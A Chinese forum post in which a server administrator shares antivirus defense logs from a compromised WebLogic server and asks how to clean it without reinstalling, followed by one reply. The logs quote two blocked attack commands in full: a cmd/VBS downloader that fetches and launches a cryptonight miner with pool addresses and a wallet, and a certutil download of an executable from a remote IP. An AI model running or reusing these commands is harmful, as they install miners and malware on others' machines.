装了火绒,智能防,查毒查不出。下面是防御日志。 1 ) 操作者:D:\Oracle\Middleware\wlserver_10.3\server\bin\beasvc.exe 命令行:D:\Oracle\MIDDLE~1\WLSERV~1.3\server\bin\beasvc.exe 风险动作:隐藏执行可疑脚本 执行文件:C:\WINDOWS\system32\cmd.exe 执行命令行:"cmd.exe" /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) > hu.vbs&@echo taskkill /IM me.exe /f&@echo taskkill /IM 3.exe /f&@echo taskkill /IM 1e.exe /f&@echo taskkill /IM te.exe /f&@echo taskkill /IM me.exe /f&@echo xPost.Open GET,http://192.99.142.248:8220/ttte.exe,0 >> hu.vbs&@echo xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >> hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo sGet.SaveToFile ttte.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@taskkill /IM iee.exe&@taskkill /IM me.exe&@taskkill /IM iee.exe&@taskkill /IM ie.exe&@taskkill /IM xe.exe&@del hu.vbs&@start ttte.exe --donate-level=1 -k -a cryptonight -o 158.69.133.20:3333 -o 192.99.142.249:3333 -o 202.144.193.110:3333 -u 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg -p x" 用户操作:已阻止 2 ) 操作者:C:\WINDOWS\system32\certutil.exe 命令行:cmd.exe /c certutil.exe -urlcache -split -f http://93.174.93.149/whdtasks.exe C:/Windows/temp/puma.exe 风险动作:利用 Certutil 下载可执行文件 执行文件:C:\WINDOWS\system32\certutil.exe 执行命令行:certutil.exe -urlcache -split -f http://93.174.93.149/whdtasks.exe C:/Windows/temp/puma.exe 用户操作:已阻止 里面装了好些个软件,服务,不想重装。
1
nicevar 2018-11-23 10:14:09 +08:00
先找到源头,是怎么破门而入的,否则重装了还是会中招,看一下上面弄下来的几个 exe 在服务器上没
|